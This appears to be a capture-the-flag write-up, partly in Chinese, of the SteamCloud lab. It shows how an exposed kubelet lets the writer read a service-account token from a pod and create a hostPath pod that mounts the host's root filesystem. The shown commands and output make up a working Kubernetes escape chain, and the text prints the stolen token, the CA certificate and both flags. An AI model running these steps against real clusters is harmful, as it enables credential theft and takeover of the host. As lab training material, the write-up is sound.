本篇文章介绍了如何在Kubernetes环境中进行信息收集、漏洞分析和特权升级。首先,扫描目标IP以获取开放端口信息,并确认目标是Kubernetes API。通过curl命令分析发现403错误,表明匿名用户没有访问权限。接着,使用kubeletctl列出Pods,发现其中有多个Pods,包括nginx。随后,通过执行命令获取token,验证身份,并创建新的Pod以挂载根目录,最终成功获取用户和根用户的flag。文章总结了在Kubernetes环境中进行渗透测试的关键步骤和学习经验。
Information Gathering
{
"target": "10.10.11.133",
"scan_time": "2026-01-01 09:48:20",
"total_open_ports": 8,
"ports": [
{
"port": 22,
"service": "ssh",
"banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"
},
{
"port": 53,
"service": "domain",
"banner": null
},
{
"port": 2379,
"service": "Unknown",
"banner": null
},
{
"port": 2380,
"service": "Unknown",
"banner": null
},
{
"port": 8443,
"service": "Unknown",
"banner": null
},
{
"port": 10249,
"service": "Unknown",
"banner": null
},
{
"port": 10250,
"service": "Unknown",
"banner": null
},
{
"port": 10256,
"service": "Unknown",
"banner": null
}
]
}Vulnerability Analysis
➜ SteamCloud curl -k https://10.10.11.133:8443/
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {
},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
"reason": "Forbidden",
"details": {
},
"code": 403
}端口 8443 配合 kind, apiVersion 等字段,确认目标是 Kubernetes API。
Exploitation (User Flag)
查看其他的pods
➜ SteamCloud kubeletctl --server 10.10.11.133 pods
┌────────────────────────────────────────────────────────────────────────────────┐
│ Pods from Kubelet │
├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤
│ │ POD │ NAMESPACE │ CONTAINERS │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 1 │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 2 │ kube-proxy-hx9h5 │ kube-system │ kube-proxy │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 3 │ storage-provisioner │ kube-system │ storage-provisioner │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 4 │ coredns-78fcd69978-glckl │ kube-system │ coredns │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 5 │ nginx │ default │ nginx │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 6 │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 7 │ etcd-steamcloud │ kube-system │ etcd │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 8 │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │
│ │ │ │ │
└───┴────────────────────────────────────┴─────────────┴─────────────────────────┘
➜ SteamCloud kubeletctl --server 10.10.11.133 scan rce
┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐
│ Node with pods vulnerable to RCE │
├───┬──────────────┬────────────────────────────────────┬─────────────┬─────────────────────────┬─────┤
│ │ NODE IP │ PODS │ NAMESPACE │ CONTAINERS │ RCE │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ │ │ │ │ │ RUN │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 1 │ 10.10.11.133 │ coredns-78fcd69978-glckl │ kube-system │ coredns │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 2 │ │ nginx │ default │ nginx │ + │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 3 │ │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 4 │ │ etcd-steamcloud │ kube-system │ etcd │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 5 │ │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 6 │ │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 7 │ │ kube-proxy-hx9h5 │ kube-system │ kube-proxy │ + │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 8 │ │ storage-provisioner │ kube-system │ storage-provisioner │ - │
└───┴──────────────┴────────────────────────────────────┴─────────────┴─────────────────────────┴─────┘
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root) # 容器内的rootPrivilege Escalation (Root Flag)
拿token去8443主api验证
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx
eyJhbGciOiJSUzI1NiIsImtpZCI6IkdDNXJWZmVMWVlTUkllc0pQT3RFYmpqNGVTcTRaclg4eGlQRG9RSEFWVXMifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzk4Nzk0NDgxLCJpYXQiOjE3NjcyNTg0ODEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjMwMzVlNTEzLTgzMDctNDk2YS05OTVhLWIyOWY0OTc1OWRlZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjQ2ODZmNTc5LTFlNmItNDZhNy1iODg2LTgwN2M5YjZjZjM3NSJ9LCJ3YXJuYWZ0ZXIiOjE3NjcyNjIwODh9LCJuYmYiOjE3NjcyNTg0ODEsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.YiPdgWLqWwlkU7qZVd9lSMPVBLLASoESkFVgpg8TD1VCyoyBj6lm0Kr4s1JQY7yW1Uvz3XgRpmlAn7iTG3TuXvL4F3_eWSmBjH3PjF2g2ZXNU_uz87ad2KWh3HY63xupy3aRD3MbB77YsI5rslSZZqXZsE6AZShwuX68KBNlPahbhGTYDOt5eR7WUIaKWEIbYu87SH2WNUYfHN9G2WUPil-C1DY94b7uXgjsqfeHBJHxC5zBaqpG1bl7zXORgAHOGozo8E6K9n5BpNqwoWeaL6mBQbyaY7KNKIPnB8m2rXioFUt7JfUWztYTZrOPpKhfFEwV2yi0yK4K3oGE8p-rSg%
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----➜ SteamCloud export token="eyJhbGciOiJSUzI1NiIsImtpZCI6IkdDNXJWZmVMWVlTUkllc0pQT3RFYmpqNGVTcTRaclg4eGlQRG9RSEFWVXMifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzk4Nzk0NDgxLCJpYXQiOjE3NjcyNTg0ODEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjMwMzVlNTEzLTgzMDctNDk2YS05OTVhLWIyOWY0OTc1OWRlZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjQ2ODZmNTc5LTFlNmItNDZhNy1iODg2LTgwN2M5YjZjZjM3NSJ9LCJ3YXJuYWZ0ZXIiOjE3NjcyNjIwODh9LCJuYmYiOjE3NjcyNTg0ODEsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.YiPdgWLqWwlkU7qZVd9lSMPVBLLASoESkFVgpg8TD1VCyoyBj6lm0Kr4s1JQY7yW1Uvz3XgRpmlAn7iTG3TuXvL4F3_eWSmBjH3PjF2g2ZXNU_uz87ad2KWh3HY63xupy3aRD3MbB77YsI5rslSZZqXZsE6AZShwuX68KBNlPahbhGTYDOt5eR7WUIaKWEIbYu87SH2WNUYfHN9G2WUPil-C1DY94b7uXgjsqfeHBJHxC5zBaqpG1bl7zXORgAHOGozo8E6K9n5BpNqwoWeaL6mBQbyaY7KNKIPnB8m2rXioFUt7JfUWztYTZrOPpKhfFEwV2yi0yK4K3oGE8p-rSg"
➜ SteamCloud nano ca.crt
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 33m
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get create list]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]有创建pods权力,添加f.yaml将/目录挂载到/mnt/root
apiVersion: v1
kind: Pod
metadata:
name: nginxt
namespace: default
spec:
containers:
- name: nginxt
image: nginx:1.14.2
volumeMounts:
- mountPath: /mnt/root
name: mount-root-into-mnt
volumes:
- name: mount-root-into-mnt
hostPath:
path: /
automountServiceAccountToken: true
hostNetwork: true➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f f.yaml
pod/nginxt created
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 38m
nginxt 1/1 Running 0 54s➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /mnt/root/home/user/user.txt" -p nginxt -c nginxt
020d0e8176d3c7931b402d69b1320930
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /mnt/root/root/root.txt" -p nginxt -c nginxt
ce7eb1df436430aab7af0b7aa92e02ec